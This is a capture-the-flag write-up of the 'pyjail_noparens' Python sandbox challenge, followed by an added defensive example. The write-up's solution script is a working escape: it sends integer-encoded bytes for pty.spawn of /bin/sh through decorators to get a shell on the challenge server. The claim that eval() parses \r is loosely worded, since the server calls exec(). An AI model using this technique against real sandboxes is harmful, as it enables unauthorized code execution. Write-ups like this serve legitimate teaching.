polygl0ts

EPFL's CTF team

pyjail_noparens

This challenge was analogous to the other Python jails, but with some additional constraints.

Source code of the server:

line = input('>>> ')

blacklist = "()="
for item in blacklist:
    if item in line.lower():
        raise Exception()

exec(line)

This challenge was not easy, as with no parentheses you are not able to make any calls to a function.

However, after playing around for a while, we noticed that the eval() Python function parsed \r as newlines, and this let us send multi-line scripts through a single call to input().

We then bypassed the need for parentheses by using Python decorators on an empty class, with an integer-encoded payload to avoid the server's parentheses check.

This was our solution for this one:

from pwn import *

io = connect('chal.b01lers.com', 1336)
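io.read()  # read the server's '>>> ' prompt
# The integer list is the byte encoding of the expression handed to eval.
# Decorators apply bottom-up: y returns the list, bytes turns it into a
# byte string, eval evaluates it, and print shows the result.
# Indentation uses spaces only; mixing tabs and spaces raises TabError.
# Every newline is sent as "\r" so input() returns the script as one line.
payload = """import pty
for x in [[112,116,121,46,115,112,97,119,110,40,34,47,98,105,110,47,115,104,34,41]]:
  for y in [lambda z: x]:
    @print
    @eval
    @bytes
    @y
    class z:
      pass""".replace("\n", "\r")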
io.sendline(payload)

io.interactive()

And this gives the following flag:

pctf{p4r3nz_4r3_t00t4lly_w1ck3d!}
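
The mechanism described above, as an added example that is not part of the original write-up: a local copy of the server's filter, a constructed harmless payload of the same shape, and an AST walk that reports what the character blacklist cannot see. The names `passes_blacklist`, `run_benign`, `implicit_calls` and the `out` collector (used in place of `@print`) are assumptions made for this example; the integers spell the expression `6*7`.

```python
import ast

BLACKLIST = "()="  # the characters the challenge server rejects

def passes_blacklist(line):
    """Same check as the server: True when no blacklisted character appears."""
    return not any(item in line.lower() for item in BLACKLIST)

# Constructed, harmless payload with the write-up's structure: the integers
# spell the expression "6*7", and "\r" stands in for every newline.
BENIGN = "\r".join([
    "for x in [[54, 42, 55]]:",
    "  for y in [lambda z: x]:",
    "    @out.append",
    "    @eval",
    "    @bytes",
    "    @y",
    "    class z:",
    "      pass",
])

def run_benign():
    """Execute the payload the way the server would and return the eval result."""
    out = []  # hypothetical collector, used here in place of @print
    exec(BENIGN, {"out": out})
    return out[0]

def implicit_calls(source):
    """List AST constructs that run code without a '(' in the source text."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.ClassDef, ast.FunctionDef)):
            found += ["decorator:" + ast.unparse(d) for d in node.decorator_list]
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            found.append("import")
        elif isinstance(node, ast.Lambda):
            found.append("lambda")
    return found

if __name__ == "__main__":
    print(passes_blacklist(BENIGN))   # filter verdict on the raw line
    print(run_benign())               # value produced by the decorator chain
    print(implicit_calls(BENIGN))     # what an AST walk reports
```

The filter inspects characters while the interpreter executes syntax: each decorator is a call that needs no parenthesis, and the `for` targets bind names without `=`. Listing these constructs shows the gap; it does not make `exec` on untrusted input safe.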